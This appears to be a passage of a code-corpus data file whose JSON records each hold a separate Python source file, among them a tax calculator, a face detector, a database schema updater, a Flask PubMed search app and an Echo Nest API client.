__name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = MyWindow()\n win.show()\n sys.exit(app.exec_())\n","repo_name":"huang443765159/kai","sub_path":"pyqt弹窗/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"33421484352","text":"col_types = {'insurance_company_name': 'String?',\n 'account_date': 'String?',\n 'claim_id': 'String?',\n 'order_id': 'String?',\n 'event_dt': 'String?',\n 'client_contact_dt': 'String?',\n 'all_documents_dt': 'String?',\n 'payment_or_refusal_dt': 'String?',\n 'client_fio': 'String?',\n 'victim_role': 'String?',\n 'phone_number': 'String?',\n 'comment': 'String?',\n 'risk_name': 'String?',\n 'payment_table_point': 'String?',\n 'ocr_rub': 'Double?',\n 'payment_rub': 'Double?',\n 'sent_to_payment_dt': 'String?',\n 'status': 'String?',\n 'refusal_of_compensation': 'Int64?'\n }\n\ncol_types.pop('sent_to_payment_dt')\n\nprint(col_types)","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/GENERAL/testing (26).py","file_name":"testing 
(26).py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1567002070","text":"#YouTube tutorial \"Python 3 Programming Tutorial\"\n\nimport csv\n\nwith open('example.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n print(readCSV)\n \n dates = []\n colors = []\n \n for column in readCSV:\n color = column[2]\n date = column[1]\n \n dates.append(date)\n colors.append(color)\n \n print(dates)\n print(colors)\n \n \n \n \n \n ","repo_name":"shmohamud/funwpython","sub_path":"opencsvtest.py","file_name":"opencsvtest.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6768977801","text":"\ndef userInput(): \n while True:\n try:\n income = round(float(input(\"Please provide monthly income: \")))\n return income\n except ValueError:\n print(\"Please enter a valid income\")\n \ndef calcTax(income):\n totalTax = 0\n firstBracket = 0\n secondBracket = 0\n thirdBracket = 0\n if income < 38000:\n totalTax = income * 0.3\n elif income >= 38000 and income < 50000:\n firstBracket = 38000 * 0.3\n secondBracket = (income - 38000) * 0.35\n totalTax = firstBracket + secondBracket\n else:\n firstBracket = 38000 * 0.3\n secondBracket = (50000 - 38000) * 0.35\n thirdBracket = (income - 50000) * 0.4\n totalTax = firstBracket + secondBracket + thirdBracket\n\n return totalTax\n\ndef main():\n income = userInput()\n tax = int(calcTax(income))\n\n print(f\"Corresponding income tax: {tax}\")\n\nif __name__ == \"__main__\":\n main()\n\n\n ","repo_name":"PhilipV1/PythonAssignment1","sub_path":"tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24776564105","text":"import colorsys\nimport os\n\nimport cv2\nimport numpy as np\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nfrom PIL import Image, ImageDraw, ImageFont\nfrom torch.autograd import Variable\n\nfrom nets.retinaface import RetinaFace\nfrom utils.anchors import Anchors\nfrom utils.box_utils import (decode, decode_landm, letterbox_image,\n non_max_suppression, retinaface_correct_boxes)\nfrom utils.config import cfg_mnet, cfg_re50\n\n\ndef preprocess_input(image):\n image -= np.array((104, 117, 123),np.float32)\n return image\n\n\nclass Retinaface(object):\n _defaults = {\n \"model_path\" : 'logs/Epoch113-Total_Loss5.4983.pth',\n \"backbone\" : 'mobilenet',\n \"confidence\" : 0.5,\n \"nms_iou\" : 0.45,\n \"cuda\" : True,\n\n \"input_shape\" : [1280, 1280, 3],\n \"letterbox_image\" : True\n }\n\n @classmethod\n def get_defaults(cls, n):\n if n in cls._defaults:\n return cls._defaults[n]\n else:\n return \"Unrecognized attribute name '\" + n + \"'\"\n\n\n def __init__(self, **kwargs):\n self.__dict__.update(self._defaults)\n if self.backbone == \"mobilenet\":\n self.cfg = cfg_mnet\n else:\n self.cfg = cfg_re50\n self.generate()\n if self.letterbox_image:\n self.anchors = Anchors(self.cfg, image_size=[self.input_shape[0], self.input_shape[1]]).get_anchors()\n\n #---------------------------------------------------#\n # load the model\n #---------------------------------------------------#\n def generate(self):\n self.net = RetinaFace(cfg=self.cfg, mode='eval').eval()\n\n #-------------------------------#\n # load model and weight\n #-------------------------------#\n print('Loading weights into 
state dict...')\n state_dict = torch.load(self.model_path)\n self.net.load_state_dict(state_dict)\n if self.cuda:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0,1'\n self.net = nn.DataParallel(self.net)\n self.net = self.net.cuda()\n print('Finished!')\n\n #---------------------------------------------------#\n # detect images\n #---------------------------------------------------#\n def detect_image(self, image):\n\n old_image = image.copy()\n\n image = np.array(image,np.float32)\n\n #---------------------------------------------------#\n # calculate scale to predect the orginal picture weight and height\n #---------------------------------------------------#\n scale = [np.shape(image)[1], np.shape(image)[0], np.shape(image)[1], np.shape(image)[0]]\n scale_for_landmarks = [np.shape(image)[1], np.shape(image)[0], np.shape(image)[1], np.shape(image)[0],\n np.shape(image)[1], np.shape(image)[0], np.shape(image)[1], np.shape(image)[0],\n np.shape(image)[1], np.shape(image)[0]]\n\n im_height, im_width, _ = np.shape(image)\n\n\n if self.letterbox_image:\n image = np.array(letterbox_image(image, [self.input_shape[1], self.input_shape[0]]), np.float32)\n else:\n self.anchors = Anchors(self.cfg, image_size=(im_height, im_width)).get_anchors()\n \n with torch.no_grad():\n #-----------------------------------------------------------#\n # normalization\n #-----------------------------------------------------------#\n image = torch.from_numpy(preprocess_input(image).transpose(2, 0, 1)).unsqueeze(0)\n\n if self.cuda:\n self.anchors = self.anchors.cuda()\n image = image.cuda()\n\n loc, conf, landms = self.net(image)\n \n #-----------------------------------------------------------#\n # decode for predicted result\n #-----------------------------------------------------------#\n boxes = decode(loc.data.squeeze(0), self.anchors, self.cfg['variance'])\n boxes = boxes.cpu().numpy()\n\n conf = conf.data.squeeze(0)[:,1:2].cpu().numpy()\n \n landms = decode_landm(landms.data.squeeze(0), self.anchors, self.cfg['variance'])\n landms = landms.cpu().numpy()\n\n boxes_conf_landms = np.concatenate([boxes, conf, landms],-1)\n boxes_conf_landms = non_max_suppression(boxes_conf_landms, self.confidence)\n if len(boxes_conf_landms)<=0:\n return old_image\n\n if self.letterbox_image:\n boxes_conf_landms = retinaface_correct_boxes(boxes_conf_landms, \\\n np.array([self.input_shape[0], self.input_shape[1]]), np.array([im_height, im_width]))\n \n boxes_conf_landms[:,:4] = boxes_conf_landms[:,:4]*scale\n boxes_conf_landms[:,5:] = boxes_conf_landms[:,5:]*scale_for_landmarks\n\n for b in boxes_conf_landms:\n text = \"{:.4f}\".format(b[4])\n b = list(map(int, b))\n\n # b[0]-b[3] are the cordinate of facial box,b[4] is the score\n cv2.rectangle(old_image, (b[0], b[1]), (b[2], b[3]), (0, 0, 255), 2)\n cx = b[0]\n cy = b[1] + 12\n cv2.putText(old_image, text, (cx, cy),\n cv2.FONT_HERSHEY_DUPLEX, 0.5, (255, 255, 255))\n\n print(b[0], b[1], b[2], b[3], b[4])\n # b[5]-b[14] are the cordinate of facial landmarks\n cv2.circle(old_image, (b[5], b[6]), 1, (0, 0, 255), 4)\n cv2.circle(old_image, (b[7], b[8]), 1, (0, 255, 255), 4)\n cv2.circle(old_image, (b[9], b[10]), 1, (255, 0, 255), 4)\n cv2.circle(old_image, (b[11], b[12]), 1, (0, 255, 0), 4)\n cv2.circle(old_image, (b[13], b[14]), 1, (255, 0, 0), 4)\n return 
old_image\n","repo_name":"Ideal-maths/PupilFace","sub_path":"retinaface.py","file_name":"retinaface.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"1240325781","text":"\"\"\"\nUsing Reinforcement learning algorithm.\nmodel is DQN_brain\n\n\"\"\"\n\nfrom war_real import *\n# import matplotlib.pyplot as plt\nimport csv\nimport pandas as pd\n\nMAP_H=6\nMAP_W=6\n\n\nAction_Space=['u','d','l','r','s']\n\n\ndef cmt_light(my_map,x,y):\n dis_to_blue=[]\n for i in range(my_map.blue_num):\n if my_map.blue_army[i].life!='live':\n dis=my_map.map_w*my_map.map_h\n else:\n dis=abs(x-my_map.blue_army[i].x)+\\\n abs(y-my_map.blue_army[i].y)\n dis_to_blue.append(dis)\n blue_target=dis_to_blue.index(min(dis_to_blue))\n print(blue_target)\n x_b=my_map.blue_army[blue_target].x\n y_b=my_map.blue_army[blue_target].y\n direction_x=np.sign(x-x_b)\n direction_y=np.sign(y-y_b)\n if direction_x==-1 and direction_y==-1:\n action=np.random.choice(['d','r','d','r','d','r','u','l'])\n elif direction_x==1 and direction_y==1:\n action=np.random.choice(['u','l','u','l','u','l','d','r'])\n elif direction_x==1 and direction_y==-1:\n action=np.random.choice(['d','l','d','l','d','l','u','r'])\n elif direction_x==-1 and direction_y==1:\n action=np.random.choice(['u','r','u','r','u','r','d','l'])\n\n elif direction_x==0 and direction_y==1:\n action=np.random.choice(['u','u','u','u','u','u','l','r'])\n elif direction_x==0 and direction_y==-1:\n action=np.random.choice(['d','d','d','d','d','d','l','r'])\n elif direction_x==1 and direction_y==0:\n action=np.random.choice(['l','l','l','l','l','l','u','d'])\n elif direction_x==-1 and direction_y==0:\n action=np.random.choice(['r','r','r','r','r','r','u','d'])\n else:\n action=np.random.choice(Action_Space)\n return action\n\ndef cmt_light_blue(my_map,x,y):\n dis_to_red=[]\n for i in range(my_map.red_num):\n if my_map.red_army[i].life!='live':\n dis=my_map.map_w*my_map.map_h\n else:\n dis=abs(x-my_map.red_army[i].x)+\\\n abs(y-my_map.red_army[i].y)\n dis_to_red.append(dis)\n red_target=dis_to_red.index(min(dis_to_red))\n print(red_target)\n x_b=my_map.red_army[red_target].x\n y_b=my_map.red_army[red_target].y\n direction_x=np.sign(x-x_b)\n direction_y=np.sign(y-y_b)\n if direction_x==-1 and direction_y==-1:\n action=np.random.choice(['d','r','d','r','d','r','u','l'])\n elif direction_x==1 and direction_y==1:\n action=np.random.choice(['u','l','u','l','u','l','d','r'])\n elif direction_x==1 and direction_y==-1:\n action=np.random.choice(['d','l','d','l','d','l','u','r'])\n elif direction_x==-1 and direction_y==1:\n action=np.random.choice(['u','r','u','r','u','r','d','l'])\n\n elif direction_x==0 and direction_y==1:\n action=np.random.choice(['u','u','u','u','u','u','l','r'])\n elif direction_x==0 and direction_y==-1:\n action=np.random.choice(['d','d','d','d','d','d','l','r'])\n elif direction_x==1 and direction_y==0:\n action=np.random.choice(['l','l','l','l','l','l','u','d'])\n elif direction_x==-1 and direction_y==0:\n action=np.random.choice(['r','r','r','r','r','r','u','d'])\n else:\n action=np.random.choice(Action_Space)\n return action\n\n\ndef move_game(my_map):\n step=0\n trace=[]\n while 1:\n # line = sys.stdin.readline()\n red_action=[]\n blue_action=[]\n if step==0:\n trace.append([my_map.red_army[0].x, my_map.red_army[0].y,\n my_map.red_army[1].x, my_map.red_army[1].y,\n my_map.red_army[2].x, my_map.red_army[2].y,\n my_map.red_army[3].x, my_map.red_army[3].y,\n 
my_map.blue_army[0].x, my_map.blue_army[0].y,\n my_map.blue_army[1].x, my_map.blue_army[1].y,\n my_map.blue_army[2].x, my_map.blue_army[2].y,\n my_map.blue_army[3].x, my_map.blue_army[3].y]\n )\n print(trace[-1])\n\n \"\"\"move action\"\"\"\n for i in range(my_map.blue_num):\n b=np.random.choice(Action_Space)\n # b = np.random.choice(['u', 'u', 'u','u', 'u'])\n blue_action.append(b)\n for i in range(my_map.red_num):\n a=cmt_light(my_map,my_map.red_army[i].x,my_map.red_army[i].y)\n red_action.append(a)\n \"\"\"move action\"\"\"\n my_map.move(red_action,blue_action)\n\n loc_x_r=[]\n loc_y_r=[]\n for agent_num in range (my_map.red_num):\n if my_map.red_army[agent_num].life=='live':\n loc_x_r.append(my_map.red_army[agent_num].x)\n loc_y_r.append(my_map.red_army[agent_num].y)\n else:\n loc_x_r.append(-1)\n loc_y_r.append(-1)\n\n loc_x_b = []\n loc_y_b = []\n for agent_num in range(my_map.blue_num):\n if my_map.blue_army[agent_num].life == 'live':\n loc_x_b.append(my_map.blue_army[agent_num].x)\n loc_y_b.append(my_map.blue_army[agent_num].y)\n else:\n loc_x_b.append(-1)\n loc_y_b.append(-1)\n\n trace.append([loc_x_r[0],loc_y_r[0],\n loc_x_r[1], loc_y_r[1],\n loc_x_r[2], loc_y_r[2],\n loc_x_r[3], loc_y_r[3],\n loc_x_b[0], loc_y_b[0],\n loc_x_b[1], loc_y_b[1],\n loc_x_b[2], loc_y_b[2],\n loc_x_b[3], loc_y_b[3],\n ]\n )\n print(trace[-1])\n reward_red, reward_blue, red_killed, blue_killed, done=my_map.step()\n if done:\n for i in range(len(trace)):\n print(trace[i])\n print('done',done)\n break\n time.sleep(0)\n step = step + 1\n return step\n\n\ndef update():\n for episode in range(500):\n step=move_game(my_map)\n print('step',step)\n\nif __name__==\"__main__\":\n\n my_map=WarMap4(MAP_W,MAP_H,4,4,True,False)\n\n if my_map.draw_pic:\n my_map.after(10,update)\n my_map.mainloop()\n else:\n update()","repo_name":"GeorgeDUT/multi_agent_game","sub_path":"real-robot-multi/robot_real.py","file_name":"robot_real.py","file_ext":"py","file_size_in_byte":6223,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"18374135378","text":"from distutils.version import LooseVersion\nimport sys\nimport service\n\n\nclass sqlUpdater(object):\n def __init__(self, engine, current_version):\n self.connection = engine.connect()\n self.current_version = current_version\n self.updated_version = current_version\n\n def compatibility_check(self):\n if self.current_version > service.ServiceModule.get_db_version():\n print(\"You cannot downgrade to a version of Insight with a database version below {0} as there will be\"\n \" database compatibility issues. Insight releases are forward compatible, but in this case\"\n \" only backward compatible to a release with database version {0}. If you wish to downgrade to an \"\n \"older version that uses a database version below {0} you must first delete your database file.\"\n .format(str(self.current_version)))\n sys.exit(1)\n\n def get_approval(self, changes):\n print(\"Insight Database Updater Warning: Certain updates modify the architecture of the database file that \"\n \"require your approval. \\nThis new update will make the following changes:\\n\\n\")\n print(changes + '\\n')\n resp = input(\"\\nProceed with these changes? Note: You will be unable to use this version of Insight unless you \"\n \"approve.[Y/N]: \").lower()\n if resp.startswith('y'):\n return\n elif resp.startswith('n'):\n print(\"No changes you were made. 
If you wish to continue using your database without changes then you must \"\n \"downgrade to an older, unsupported Insight release.\")\n sys.exit(1)\n else:\n print(\"Unknown response. No changes were made.\")\n sys.exit(1)\n\n def get_versions_higher(self):\n for i in dir(self):\n if i.startswith(\"sqlV\"):\n func = getattr(self, i)\n if LooseVersion(func.__doc__) > self.current_version:\n yield func\n\n def __execute_statements(self, statements):\n for i in statements:\n print('Executing statement: {}'.format(str(i)))\n self.connection.execute(i)\n\n def sqlV_0_12_1(self):\n \"\"\"v0.12.1\"\"\"\n for i in self.sqlV_0_12_0():\n yield i\n\n def sqlV_0_12_0(self):\n \"\"\"v0.12.0\"\"\"\n changes = \"- Delete all access tokens.\\n- Require users to readd their standing tokens.\\n+ Encrypt all \" \\\n \"new access tokens using a generated secret key.\"\n self.get_approval(changes)\n yield 'DROP TABLE IF EXISTS contacts_alliances;'\n yield 'DROP TABLE IF EXISTS contacts_corporations;'\n yield 'DROP TABLE IF EXISTS contacts_characters;'\n yield 'DROP TABLE IF EXISTS discord_tokens;'\n yield 'DROP TABLE IF EXISTS tokens;'\n\n def sqlV_1_1_0(self):\n \"\"\"v1.1.0\"\"\"\n yield 'ALTER TABLE discord_channels ADD appearance_id INTEGER DEFAULT 0 NOT NULL;'\n\n def sqlV_0_10_1(self):\n \"\"\"v0.10.1\"\"\"\n yield 'ALTER TABLE discord_enFeed ADD template_id INTEGER DEFAULT 0 NOT NULL;'\n yield 'ALTER TABLE discord_capRadar ADD template_id INTEGER DEFAULT 0 NOT NULL;'\n\n def sqlV_1_2_0(self):\n \"\"\"v1.2.0\"\"\"\n yield 'ALTER TABLE discord_enFeed ADD minValue FLOAT DEFAULT 0.0 NOT NULL;'\n\n def sqlV_1_3_0(self):\n \"\"\"v1.3.0\"\"\"\n yield 'CREATE INDEX ix_attackers_kill_id on attackers (kill_id);'\n\n def sqlV_2_1_0(self):\n \"\"\"v2.1.0\"\"\"\n yield 'CREATE INDEX ix_regions_name on regions (name);'\n yield 'CREATE INDEX ix_constellations_name on constellations (name);'\n yield 'CREATE INDEX ix_categories_name on categories (name);'\n yield 'CREATE INDEX ix_groups_name on groups (name);'\n yield 'CREATE INDEX ix_types_type_name on types (type_name);'\n\n def sqlV_2_2_0(self):\n \"\"\"v2.2.0\"\"\"\n yield \"alter table discord_channels add mention VARCHAR(9) NOT NULL DEFAULT 'noMention' constraint mention_method check (mention IN ('noMention', 'here', 'everyone'));\"\n yield 'alter table discord_channels add mention_every FLOAT NOT NULL DEFAULT 15.0;'\n\n def sqlV_2_3_0(self):\n \"\"\"v2.3.0\"\"\"\n yield \"alter table discord_channels add modification_lock BOOLEAN NOT NULL DEFAULT 0 check (modification_lock IN (0, 1));\"\n\n def sqlV_2_4_0(self):\n \"\"\"v2.4.0\"\"\"\n yield \"ALTER TABLE tokens ADD error_count INTEGER DEFAULT 0 NOT NULL;\"\n\n def sqlV_2_5_0(self):\n \"\"\"v2.5.0\"\"\"\n yield 'CREATE INDEX IF NOT EXISTS ix_kills_killmail_time on kills (\"killmail_time\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_kills_solar_system_id on kills (\"solar_system_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_kills_locationID on kills (\"locationID\");'\n\n yield 'CREATE INDEX IF NOT EXISTS ix_attackers_character_id on attackers (\"character_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_attackers_corporation_id on attackers (\"corporation_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_attackers_alliance_id on attackers (\"alliance_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_attackers_ship_type_id on attackers (\"ship_type_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_attackers_weapon_type_id on attackers (\"weapon_type_id\");'\n\n yield 'CREATE INDEX IF NOT EXISTS ix_systems_constellation_id on 
systems (\"constellation_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_constellations_region_id on constellations (\"region_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_locations_typeID on locations (\"typeID\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_locations_groupID on locations (\"groupID\");'\n\n yield 'CREATE INDEX IF NOT EXISTS ix_types_group_id on types (\"group_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_groups_category_id on groups (\"category_id\");'\n\n yield 'CREATE INDEX IF NOT EXISTS ix_victims_character_id on victims (\"character_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_victims_corporation_id on victims (\"corporation_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_victims_alliance_id on victims (\"alliance_id\");'\n yield 'CREATE INDEX IF NOT EXISTS ix_victims_ship_type_id on victims (\"ship_type_id\");'\n\n def sqlV_2_6_0(self):\n \"\"\"v2.6.0\"\"\"\n yield 'UPDATE kills SET \"locationID\" = NULL WHERE \"locationID\" = 0;'\n\n def update_all(self):\n \"\"\"Updates tables, returning the latest successful updated version\"\"\"\n self.compatibility_check()\n error = False\n for i in self.get_versions_higher():\n try:\n results = list(i())\n print('Updating database to version: {}'.format(i.__doc__))\n self.__execute_statements(results)\n self.updated_version = i.__doc__\n print('DB patch ok')\n except Exception as ex:\n print(ex)\n error = True\n break\n return (str(self.updated_version), error)\n\n","repo_name":"EVEInsight/Insight","sub_path":"Insight/database/db_tables/sqlUpdater.py","file_name":"sqlUpdater.py","file_ext":"py","file_size_in_byte":7032,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"66"} +{"seq_id":"27930656276","text":"import torch \nimport torch.nn as nn \nimport torch.nn.functional as F\n\nclass Emotic(nn.Module):\n ''' Emotic Model'''\n def __init__(self, num_context_features, num_body_features):\n n_feature_hidden = 1024\n super(Emotic,self).__init__()\n self.num_context_features = num_context_features\n self.num_body_features = num_body_features\n self.fc1 = nn.Linear((self.num_context_features + num_body_features), n_feature_hidden)\n self.bn1 = nn.BatchNorm1d(n_feature_hidden)\n self.fc2 = nn.Linear(1024, 512)\n self.fc_cat = nn.Linear(512, 26)\n self.fc_cont = nn.Linear(512, 3)\n self.relu = nn.ReLU()\n\n \n def forward(self, x_context, x_body):\n context_features = x_context.view(-1, self.num_context_features)\n body_features = x_body.view(-1, self.num_body_features)\n fuse_features = torch.cat((context_features, body_features), 1)\n fuse_out = self.fc1(fuse_features)\n fuse_out = self.bn1(fuse_out)\n fuse_out = self.relu(fuse_out)\n fuse_out = F.dropout(fuse_out, p=0.5, training=self.training) \n fuse_out = self.fc2(fuse_out)\n fuse_out = F.dropout(fuse_out, p=0.5, training=self.training) \n cat_out = self.fc_cat(fuse_out)\n cont_out = self.fc_cont(fuse_out)\n return cat_out, cont_out\n","repo_name":"votnhan/context_based_emotion","sub_path":"emotic.py","file_name":"emotic.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13519981962","text":"from flask import Flask, render_template, request, Response, redirect, url_for\nfrom flask import send_file\nfrom datetime import date\nimport datetime\nfrom openpyxl import load_workbook\nimport io\nimport pandas as pd\nimport xlsxwriter\n\nimport pubmed_search\n\napp = Flask(__name__)\napp.secret_key = 'secret'\n\n\n@app.route('/')\ndef 
search_select():\n return render_template('index.html')\n\n@app.route('/retry')\ndef search_retry():\n return render_template('resubmit.html')\n\n@app.route('/result', methods=['POST'])\ndef result():\n start = request.form.get(\"start-date\")\n end = request.form.get(\"end-date\")\n authors = request.form.get(\"authors\")\n terms = request.form.get(\"terms\")\n ccsg = request.form.get(\"ccsg\")\n if not start or not end or not authors or not terms or not ccsg:\n return redirect(url_for('search_retry'))\n df = pubmed_search.main(start, end)\n dfName = start + \"TO\" + end + \".xlsx\"\n df.to_excel('/Users/kgovid/PycharmProjects/jaxPublicationClassifier1/' + dfName, index=False)\n return render_template(\"simple.html\", dataframe=df.to_html(), start=start, end=end)\n\n\n@app.route('/downloadFile//', methods=[\"POST\", \"GET\"])\ndef download_file(start, end):\n start = start\n end = end\n dfName = start + \"TO\" + end + \".xlsx\"\n print(dfName)\n directory = dfName\n print(directory)\n return send_file(filename_or_fp=directory,\n as_attachment=True)\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0')\n","repo_name":"dhatchi711/jaxPublicationClassifier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35834831301","text":"\"\"\"Program for encoding and decoding messages with basic ciphers\"\"\"\nfrom crypto import atbash\nfrom crypto import rail\nfrom crypto import polybius\n\nif __name__ == '__main__':\n\n atb_cipher = atbash.Atbash()\n rail_cipher = rail.Rail()\n polybius_cipher = polybius.Polybius()\n\n secure = rail_cipher.encrypt(text='')\n\n insecure = rail_cipher.decrypt(text=secure)\n\n app_on = ''\n\n print('Welcome to the magic Cipho-Matic!')\n while app_on.lower() != 'n':\n\n select = 0\n selector = input(\n 'Select a Cipher\\n\\n1 - Atbash\\n'\n '2 - Transposition Rail\\n3 - Polybius\\n\\n-- '\n )\n\n enc_or_dec = 'Would you like to 1 - encode or 2 - decipher? : '\n\n if selector == '1':\n select = input(enc_or_dec)\n if select == '1':\n keyword = input('What is the message? : ')\n print(atb_cipher.encrypt(keyword))\n if select == '2':\n keyword = input('What is the code? : ')\n print(atb_cipher.decrypt(keyword))\n\n if selector == '2':\n select = input(enc_or_dec)\n if select == '1':\n keyword = input('What is the message? : ')\n print(rail_cipher.encrypt(keyword))\n if select == '2':\n keyword = input('What is the code? : ')\n print(rail_cipher.decrypt(keyword))\n\n if selector == '3':\n select = input(enc_or_dec)\n if select == '1':\n keyword = input('What is the message? : ')\n print(polybius_cipher.encrypt(keyword))\n if select == '2':\n keyword = input('What is the code? 
: ')\n print(polybius_cipher.decrypt(keyword))\n\n input('Press enter to continue\\n\\n\\n')\n\n app_on = input('Would you like to work on another message?'\n ' y/n : \\n\\n -- ')\n","repo_name":"MisterAJ/ciphers","sub_path":"cipher_app.py","file_name":"cipher_app.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3077084540","text":"import urllib2\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nimport hashlib\nfrom proxies import TrackProxy\nimport util\nimport time\n\n# Seconds to wait for asynchronous track/upload or track/analyze jobs to complete.\nDEFAULT_ASYNC_TIMEOUT = 60\n\nclass Track(TrackProxy):\n \"\"\"\n Represents an audio file and its analysis from The Echo Nest.\n All public methods in this module return Track objects.\n\n Depending on the information available, a Track may have some or all of the\n following attributes:\n\n acousticness float: confidence the track is \"acoustic\" (0.0 to 1.0)\n analysis_url URL to retrieve the complete audio analysis (time expiring)\n analyzer_version str: e.g. '3.01a'\n artist str or None: artist name\n artist_id Echo Nest ID of artist, if known\n danceability float: relative danceability (0.0 to 1.0)\n duration float: length of track in seconds\n energy float: relative energy (0.0 to 1.0)\n id str: Echo Nest Track ID, e.g. 'TRTOBXJ1296BCDA33B'\n key int: between 0 (key of C) and 11 (key of B flat) inclusive\n liveness float: confidence the track is \"live\" (0.0 to 1.0)\n loudness float: overall loudness in decibels (dB)\n md5 str: 32-character checksum of the original audio file, if available\n mode int: 0 (major) or 1 (minor)\n song_id The Echo Nest song ID for the track, if known\n speechiness float: likelihood the track contains speech (0.0 to 1.0)\n status str: analysis status, e.g. 'complete'\n tempo float: overall BPM (beats per minute)\n time_signature beats per measure (e.g. 3, 4, 5, 7)\n title str or None: song title\n valence float: a range from negative to positive emotional content (0.0 to 1.0)\n\n The following attributes are available only after calling Track.get_analysis():\n \n analysis_channels int: the number of audio channels used during analysis\n analysis_sample_rate int: the sample rate used during analysis\n bars list of dicts: timing of each measure\n beats list of dicts: timing of each beat\n codestring ENMFP code string\n code_version version of ENMFP code generator\n decoder audio decoder used by the analysis (e.g. 
ffmpeg)\n echoprintstring fingerprint string using Echoprint (http://echoprint.me)\n echoprint_version version of Echoprint code generator\n end_of_fade_in float: time in seconds track where fade-in ends\n key_confidence float: confidence that key detection was accurate\n meta dict: other track metainfo (bitrate, album, genre, etc.)\n mode_confidence float: confidence that mode detection was accurate\n num_samples int: total samples in the decoded track\n offset_seconds unused, always 0\n sample_md5 str: 32-character checksum of the decoded audio file\n samplerate the audio sample rate detected in the file\n sections list of dicts: larger sections of song (chorus, bridge, solo, etc.)\n segments list of dicts: timing, pitch, loudness and timbre for each segment\n start_of_fade_out float: time in seconds where fade out begins\n synchstring string providing synchronization points throughout the track\n synch_version version of the synch string algorithm\n tatums list of dicts: the smallest metrical unit (subdivision of a beat)\n tempo_confidence float: confidence that tempo detection was accurate\n time_signature_confidence float: confidence that time_signature detection was accurate\n \n Each bar, beat, section, segment and tatum has a start time, a duration, and a confidence,\n in addition to whatever other data is given.\n\n Examples:\n\n >>> t = track.track_from_id('TRJSEBQ1390EC0B548')\n >>> t\n \n\n >>> t = track.track_from_md5('96fa0180d225f14e9f8cbfffbf5eb81d')\n >>> t\n \n >>>\n\n >>> t = track.track_from_filename('Piano Man.mp3')\n >>> t.meta\n AttributeError: 'Track' object has no attribute 'meta'\n >>> t.get_analysis()\n >>> t.meta\n {u'album': u'Piano Man',\n u'analysis_time': 8.9029500000000006,\n u'analyzer_version': u'3.1.3',\n u'artist': u'Billy Joel',\n u'bitrate': 160,\n u'detailed_status': u'OK',\n u'filename': u'/tmp/tmphrBQL9/fd2b524958548e7ecbaf758fb675fab1.mp3',\n u'genre': u'Soft Rock',\n u'sample_rate': 44100,\n u'seconds': 339,\n u'status_code': 0,\n u'timestamp': 1369400122,\n u'title': u'Piano Man'}\n >>>\n \"\"\"\n def __repr__(self):\n try:\n return \"<%s - %s>\" % (self._object_type.encode('utf-8'), self.title.encode('utf-8'))\n except AttributeError:\n # the title is None\n return \"< Track >\"\n\n def __str__(self):\n return self.title.encode('utf-8')\n \n def get_analysis(self):\n \"\"\" Retrieve the detailed analysis for the track, if available. \n Raises Exception if unable to create the detailed analysis. \"\"\"\n if self.analysis_url:\n try:\n # Try the existing analysis_url first. This expires shortly\n # after creation.\n try:\n json_string = urllib2.urlopen(self.analysis_url).read()\n except urllib2.HTTPError:\n # Probably the analysis_url link has expired. 
Refresh it.\n param_dict = dict(id = self.id)\n new_track = _profile(param_dict, DEFAULT_ASYNC_TIMEOUT)\n if new_track and new_track.analysis_url:\n self.analysis_url = new_track.analysis_url\n json_string = urllib2.urlopen(self.analysis_url).read()\n else:\n raise Exception(\"Failed to create track analysis.\")\n\n analysis = json.loads(json_string)\n analysis_track = analysis.pop('track', {})\n self.__dict__.update(analysis)\n self.__dict__.update(analysis_track)\n except Exception: #pylint: disable=W0702\n # No detailed analysis found.\n raise Exception(\"Failed to create track analysis.\")\n else:\n raise Exception(\"Failed to create track analysis.\")\n\n\ndef _wait_for_pending_track(trid, timeout):\n status = 'pending'\n param_dict = {'id': trid}\n param_dict['format'] = 'json'\n param_dict['bucket'] = 'audio_summary'\n start_time = time.time()\n end_time = start_time + timeout\n # counter for seconds to wait before checking track profile again.\n timeout_counter = 3\n while status == 'pending' and time.time() < end_time:\n time.sleep(timeout_counter)\n result = util.callm('track/profile', param_dict)\n status = 